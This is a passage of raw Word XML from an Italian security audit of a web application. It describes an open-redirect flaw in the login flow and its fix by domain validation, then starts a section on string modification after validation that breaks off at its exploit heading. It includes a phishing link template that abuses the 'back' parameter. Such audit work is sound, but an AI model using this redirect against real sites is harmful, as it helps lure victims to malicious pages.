              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251904000" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="730C0CC7" wp14:editId="18741137">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>308610</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6856095" cy="635"/>
                <wp:effectExtent l="0" t="0" r="1905" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1297630940" name="Casella di testo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BC0C797" w14:textId="5DD625B4"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5</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0CC7" id="_x0000_s1102" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:24.3pt;width:539.8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e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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="1BC0C797" w14:textId="5DD625B4"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870E32">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>75</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: UserController.java</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A66DB7F" w14:textId="661ACC65" w:rsidR="00350E38" w:rsidRDefault="00350E38" w:rsidP="00467BBC"/>
    <w:p w14:paraId="28E73157" w14:textId="7C5AEB13" w:rsidR="00350E38" w:rsidRDefault="00350E38" w:rsidP="00467BBC"/>
    <w:p w14:paraId="25B0852F" w14:textId="5D557B01" w:rsidR="00350E38" w:rsidRDefault="00350E38" w:rsidP="00467BBC"/>
    <w:p w14:paraId="084D97BB" w14:textId="744254CD" w:rsidR="00350E38" w:rsidRDefault="00350E38" w:rsidP="00467BBC"/>
    <w:p w14:paraId="26054E74" w14:textId="77777777" w:rsidR="00094023" w:rsidRDefault="00094023" w:rsidP="00467BBC"/>
    <w:p w14:paraId="73212B9D" w14:textId="0ACBFD78" w:rsidR="00FF363E" w:rsidRPr="00845CA0" w:rsidRDefault="00241973" w:rsidP="00845CA0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Open</w:t>
      </w:r>
      <w:r w:rsidR="005F7CDE" w:rsidRPr="00845CA0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> redirect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54680F06" w14:textId="4D68593F" w:rsidR="00D03FA6" w:rsidRDefault="00094023" w:rsidP="00094023">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
      </w:pPr>
      <w:r w:rsidRPr="00094023">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00241973">
        <w:t xml:space="preserve">App.js, </w:t>
      </w:r>
      <w:r>
        <w:t>ProtectedRoutesUser.jsx, LoginService.jsx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8A1237" w14:textId="60FC429D" w:rsidR="00094023" w:rsidRDefault="00094023" w:rsidP="00D03FA6">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
      </w:pPr>
      <w:r w:rsidRPr="00094023">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Riga</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00241973">
        <w:t>44 App.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7150C4A2" w14:textId="77777777" w:rsidR="00094023" w:rsidRPr="00D03FA6" w:rsidRDefault="00094023" w:rsidP="00D03FA6">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F4F7A44" w14:textId="2F8991DA" w:rsidR="00FF363E" w:rsidRDefault="00FF363E" w:rsidP="005F7CDE">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">È un attacco possibile quando un’applicazione web accetta </w:t>
      </w:r>
      <w:r w:rsidRPr="00C74003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>input non validati</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> che possono far </w:t>
      </w:r>
      <w:r w:rsidR="0060328E">
        <w:t>sì</w:t>
      </w:r>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5B6BAF0E" w14:textId="484529FE" w:rsidR="00094023" w:rsidRDefault="00094023" w:rsidP="005F7CDE">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
      </w:pPr>
      <w:r>
        <w:t>L’idea è quella di implementare una funzionalità che, dopo che l’utente si è autenticato, esso venga reindirizzato alla route che stava provando a visitare prima di aver fatto il login. A tale scopo viene usato il parametro back dove si specifica l’</w:t>
      </w:r>
      <w:r w:rsidRPr="00C74003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a cui l’utente verrà reindirizzato</w:t>
      </w:r>
      <w:r w:rsidR="00C74003">
        <w:t>, come mostrato in Figura 7</w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00C74003">
        <w:t xml:space="preserve">. In particolare, la vulnerabilità si ha perché in </w:t>
      </w:r>
      <w:r w:rsidR="00C74003" w:rsidRPr="002675ED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LoginService.jsx</w:t>
      </w:r>
      <w:r w:rsidR="00C74003">
        <w:t xml:space="preserve"> non ci sono controlli sull’URL inserito come parametro, visibile in Figura 7</w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00C74003">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33315ECC" w14:textId="77777777" w:rsidR="00FF363E" w:rsidRDefault="00FF363E" w:rsidP="005F7CDE">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E937916" w14:textId="5999B167" w:rsidR="00094023" w:rsidRDefault="00094023" w:rsidP="005F7CDE">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
      </w:pPr>
      <w:r w:rsidRPr="00094023">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploit</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F4DF7C" w14:textId="28942A49" w:rsidR="00094023" w:rsidRDefault="00094023" w:rsidP="00094023">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
      </w:pPr>
      <w:r>
        <w:t>L’attaccante invierà alla vittima un URL specificato nel parametro back con l’obiettivo di reindirizzarlo a un sito malevolo, ad esempio come spam email o SMS per phishing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9AAC3A" w14:textId="6310612E" w:rsidR="00094023" w:rsidRDefault="00094023" w:rsidP="00094023">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il link da inviare a un utente per fare l’attacco è il seguente: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACE1152" w14:textId="77777777" w:rsidR="00094023" w:rsidRDefault="00094023" w:rsidP="00094023">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E7B7857" w14:textId="31B9D1C4" w:rsidR="00094023" w:rsidRDefault="00094023" w:rsidP="00094023">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
      </w:pPr>
      <w:r w:rsidRPr="005F7CDE">
        <w:t>http://localhost:4200/login?back=sito malevolo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098EBC81" w14:textId="49090A6B" w:rsidR="00094023" w:rsidRDefault="0060328E" w:rsidP="005F7CDE">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252001280" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="581EB652" wp14:editId="7AE182E9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>8890</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5753100" cy="2486025"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:wrapNone/>
            <wp:docPr id="164795367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pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A817920" w14:textId="22BE231B" w:rsidR="005F7CDE" w:rsidRDefault="00094023" w:rsidP="005F7CDE">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251906048" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="19DA4D46" wp14:editId="6DD03753">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>876935</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2367280</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4366260" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="822976408" name="Casella di testo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3FC888D" w14:textId="2368063F"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870E32">
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:t>76</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: ProtectedRoutesUs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4D46" id="_x0000_s1103" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:69.05pt;margin-top:186.4pt;width:34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Ta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9lsOqOQpNjs5lO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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="33FC888D" w14:textId="2368063F"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870E32">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>76</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: ProtectedRoutesUser.jsx</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5152AF" w14:textId="001575BC"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5F2ADC28" w:rsidR="00D03FA6" w:rsidRPr="005F7CDE" w:rsidRDefault="00D03FA6" w:rsidP="005F7CDE">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="593A9907" w14:textId="134B40FE"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65B3DC1F" w14:textId="77777777" w:rsidR="00094023" w:rsidRDefault="00094023" w:rsidP="00467BBC"/>
    <w:p w14:paraId="222A9BC1" w14:textId="41F76F2C" w:rsidR="00335218" w:rsidRDefault="0060328E" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252000256" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4C70AF9E" wp14:editId="5FA7CE88">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>326390</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1482090</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5467350" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="411153852" name="Casella di testo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99E88EB" w14:textId="3FF639DA"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sidR="00870E32">
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:t>77</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: App.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F9E" id="_x0000_s1104" type="#_x0000_t202" style="position:absolute;margin-left:25.7pt;margin-top:116.7pt;width:43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GwIAAEA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p7dXE8pJCk2u57G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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="299E88EB" w14:textId="3FF639DA"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sidR="00870E32">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>77</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: App.js</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251998208" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="23CAA260" wp14:editId="23CE0A84">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>15240</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5467350" cy="1409700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1412066717"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pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0551CBB4" w14:textId="77777777" w:rsidR="00094023" w:rsidRDefault="00094023" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1ADD7D5B" w14:textId="77777777" w:rsidR="00C74003" w:rsidRDefault="00C74003" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5FE3C494" w14:textId="77777777" w:rsidR="00094023" w:rsidRDefault="00094023" w:rsidP="00467BBC"/>
    <w:p w14:paraId="02F032F9" w14:textId="120A70DD" w:rsidR="005E7293" w:rsidRDefault="0060328E" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252002304" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="70AA1E6D" wp14:editId="36A0E692">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-678180</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3392883" cy="3627120"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1400426169"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2883" cy="3627120"/>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265D6E18" w14:textId="27307147" w:rsidR="00094023" w:rsidRDefault="00094023" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5206AC41" w14:textId="4CFF9C69" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="781816BA" w14:textId="010CB7D3" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="075EA571" w14:textId="4DD4D08A" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1F31124B" w14:textId="2C6DA6C9" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2AEF0778" w14:textId="17B31D8F" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="6D9B8CF4" w14:textId="2B9BCF0D" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2F705EA3" w14:textId="5BD6BE01" w:rsidR="005E7293" w:rsidRDefault="00C74003" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251908096" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3F98BF70" wp14:editId="48AB3CA7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>152400</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3382645" cy="635"/>
                <wp:effectExtent l="0" t="0" r="8255" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1879123684" name="Casella di testo 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1EB7E308" w14:textId="66DD8624"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870E32">
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:t>78</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: LoginService.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BF70" id="_x0000_s1105" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:12pt;width:266.3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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="1EB7E308" w14:textId="66DD8624"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870E32">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>78</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: LoginService.jsx</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B99FF9" w14:textId="7622E081" w:rsidR="00C74003" w:rsidRDefault="00C74003" w:rsidP="00467BBC"/>
    <w:p w14:paraId="3D618DE5" w14:textId="06F52D99" w:rsidR="00094023" w:rsidRDefault="00861705" w:rsidP="00467BBC">
      <w:r w:rsidRPr="00094023">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fix</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7267B871" w14:textId="79783BBB" w:rsidR="00FF363E" w:rsidRDefault="00C74003" w:rsidP="00467BBC">
      <w:r>
        <w:t>Per risolvere la problematica, b</w:t>
      </w:r>
      <w:r w:rsidR="00861705">
        <w:t>isogna validare il dominio a cui si viene reindirizzati</w:t>
      </w:r>
      <w:r>
        <w:t>, in modo da bloccare URL sconosciuti</w:t>
      </w:r>
      <w:r w:rsidR="00861705">
        <w:t xml:space="preserve">. Se si </w:t>
      </w:r>
      <w:r>
        <w:t>usa</w:t>
      </w:r>
      <w:r w:rsidR="00861705">
        <w:t xml:space="preserve"> un dominio sbagliato si viene indirizzati comunque alla home del sito.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED334B9" w14:textId="66EE7CB1" w:rsidR="00861705" w:rsidRDefault="0060328E" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252003328" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7864C2D8" wp14:editId="663285B0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>10795</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4274185" cy="4838700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="801436068"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9">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect t="3960" b="6246"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4274185"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3D35E5B7"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085798A4" w14:textId="77777777" w:rsidR="00094023" w:rsidRDefault="00094023" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1E6A418C" w14:textId="77777777" w:rsidR="00094023" w:rsidRDefault="00094023" w:rsidP="00467BBC"/>
    <w:p w14:paraId="75DF6C1B" w14:textId="5EEDD732" w:rsidR="00861705" w:rsidRDefault="00861705" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0AA7516F" w14:textId="14985CCA" w:rsidR="00094023" w:rsidRDefault="0060328E" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251910144" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0D14167D" wp14:editId="342C5B92">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>756920</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3954145" cy="635"/>
                <wp:effectExtent l="0" t="0" r="8255" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1284111361" name="Casella di testo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F0FD557" w14:textId="239E5738"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870E32">
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:t>79</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: LoginService.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167D" id="_x0000_s1106" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:59.6pt;width:311.3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pP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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="5F0FD557" w14:textId="239E5738"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870E32">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>79</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: LoginService.jsx</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8AA5C1" w14:textId="3D8C4F71" w:rsidR="00296FF5" w:rsidRPr="00094023" w:rsidRDefault="00825307" w:rsidP="00094023">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00094023">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Performing string modification after validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E69C657" w14:textId="099B0FD1" w:rsidR="00D03FA6" w:rsidRDefault="00094023" w:rsidP="00825307">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
      </w:pPr>
      <w:r w:rsidRPr="00094023">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00C74003">
        <w:t xml:space="preserve"> HobbyController.java </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC1C2B8" w14:textId="756A48C8" w:rsidR="00094023" w:rsidRDefault="00094023" w:rsidP="00825307">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
      </w:pPr>
      <w:r w:rsidRPr="00094023">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Riga</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00C74003">
        <w:t xml:space="preserve"> 79</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB55B0A" w14:textId="77777777" w:rsidR="00094023" w:rsidRDefault="00094023"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 xml:space="preserve">una stringa viene modificata dopo essere stata validata, creando la possibilità che tale stringa diventi malevola soltanto dopo la modifica e bypassando quindi la </w:t>
      </w:r>
      <w:r w:rsidR="0053542A" w:rsidRPr="00726EFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>validazione</w:t>
      </w:r>
      <w:r w:rsidR="0053542A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DAE267" w14:textId="02D0913C" w:rsidR="00C74003"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xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00C74003">
        <w:t xml:space="preserve">In, particolare, nel metodo </w:t>
      </w:r>
      <w:r w:rsidR="00C74003" w:rsidRPr="00726EFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SaveHobby()</w:t>
      </w:r>
      <w:r w:rsidR="00C74003">
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidR="00C74003" w:rsidRPr="00726EFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HobbyController.java</w:t>
      </w:r>
      <w:r w:rsidR="00C74003">
        <w:t xml:space="preserve"> si fa la validazione </w:t>
      </w:r>
      <w:r w:rsidR="00726EFA">
        <w:t xml:space="preserve">del nome ma si effettua il replace dopo aver fatto il controllo sul pattern, mostrato in Figura </w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>80</w:t>
      </w:r>
      <w:r w:rsidR="00726EFA">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37507F03" w14:textId="77777777" w:rsidR="00C74003" w:rsidRDefault="00C74003" w:rsidP="00825307">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06A83F1A" w14:textId="270C56EA" w:rsidR="00C74003" w:rsidRDefault="00C74003" w:rsidP="00825307">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
      </w:pPr>
      <w:r w:rsidRPr="00C74003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploit</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27114DEA" w14:textId="05E5FEF8" w:rsidR="00A86CD2" w:rsidRPr="00A86CD2" w:rsidRDefault="00A86CD2" w:rsidP="00825307">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="732"/>
